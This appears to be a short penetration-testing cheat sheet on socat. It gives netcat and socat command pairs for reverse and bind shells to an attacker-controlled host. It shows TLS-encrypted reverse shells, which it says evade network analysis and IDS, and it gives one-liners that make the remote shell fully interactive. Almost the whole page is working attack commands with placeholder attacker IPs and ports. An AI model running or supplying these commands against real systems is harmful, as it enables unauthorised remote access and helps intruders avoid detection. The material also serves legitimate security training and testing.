2 min read

socat: The anything-to-anything connector!

socat vs. netcat

socat ↔ netcat command equivalencies:

# Reverse shell (attacker)
#
nc -lnp $LISTENER_PORT
socat TCP-LISTEN:$LISTENER_PORT -
 
# Reverse shell (target)
#
nc $ATTACKER_IP $LISTENER_PORT -e /bin/bash
socat TCP:$ATTACKER_IP:$LISTENER_PORT EXEC:"/bin/bash -li"
 
# Bind shell (attacker)
#
nc $TARGET_IP $LISTENER_PORT
socat TCP:$TARGET_IP:$LISTENER_PORT
 
# Bind shell (target)
#
nc -lnp $LISTENER_PORT -e /bin/bash
socat TCP-LISTEN:$LISTENER_PORT EXEC:"/bin/bash -li"

socat gets us an interactive login shell right out the gate, though we’re still vulnerable to Ctrl+C. Note that when binding to PowerShell, use powershell.exe,pipes in order to force PowerShell to use UNIX-style STDIN/STDOUT.

Encrypted shells

socat can make encrypted connections, which foil after-the-fact network analysis and may circumvent IDS entirely.

# Generate a self-signed certificate.
#
openssl req --newkey rsa:2048 -nodes \
            -keyout shell.key -x509 -days 362 \
            -out shell.crt
 
# Create a PEM file combining the certificate and key.
#
cat shell.key shell.crt > shell.pem
 
# Start a listener.
#
socat OPENSSL-LISTEN:$LISTENER_PORT,cert=shell.pem,verify=0 -
 
# Start the reverse shell on the target.
#
socat OPENSSL:$ATTACKER_IP:$LISTENER_PORT,verify=0 EXEC:"/bin/bash -li"

The verify=0 directive turns off certificate validation, so this isn’t a “secure” connection in the sense that it’s been authenticated, but it is secure in the sense that it’s encrypted.

Shell “stabilization”

Automatically stabilize a reverse shell with socat

Shell “stabilization” refers to the process of making a remote shell behave like a normal local shell — so, allowing interactive programs to work properly, ensuring that input is not echoed inappropriately, etc.

We can use socat to create an auto-stabilized reverse shell on UNIX-like systems.

# Attacker: Connect $LISTENER_PORT to the current TTY,
# send raw keycodes, and turn off terminal echo.
# Basically the `stty raw -echo`.
#
socat TCP-LISTEN:$LISTENER_PORT FILE:`tty`,raw,echo=0
 
# Target: Connect the listener on the attacker to an
# interactive login bash shell.
#
#     pty    - allocate a PTTY
#     stderr - redirect STDERR to the attacker
#     sigint - pass signals (Ctrl+C) through
#     setsid - use a new session
#     sane   - use a variety of tweaks to "normalize" the
#              terminal's environment
#
socat TCP:$ATTACKER_IP:$LISTENER_PORT \
      EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane

Same thing, but over an encrypted connection:

# Attacker: Connect $LISTENER_PORT to the current TTY,
# send raw keycodes, and turn off terminal echo. Basically
# the `stty raw -echo`.
#
socat \
	OPENSSL-LISTEN:$LISTENER_PORT,cert=$PEM_FILE,verify=0 \
	FILE:`tty`,raw,echo=0
 
# Target: Connect the listener on the attacker to an
# interactive login bash shell.
#
#     pty    - allocate a PTTY
#     stderr - redirect STDERR to the attacker
#     sigint - pass signals (Ctrl+C) through
#     setsid - use a new session
#     sane   - use a variety of tweaks to "normalize" the
#              terminal's environment
#
socat \
	OPENSSL:$ATTACKER_IP:$LISTENER_PORT,verify=0 \
	EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane

Tip

The reverse shell will not pick up on your terminal size, so you’ll need to manually specify it using stty rows and stty cols.

Link to original

Backlinks

Graph View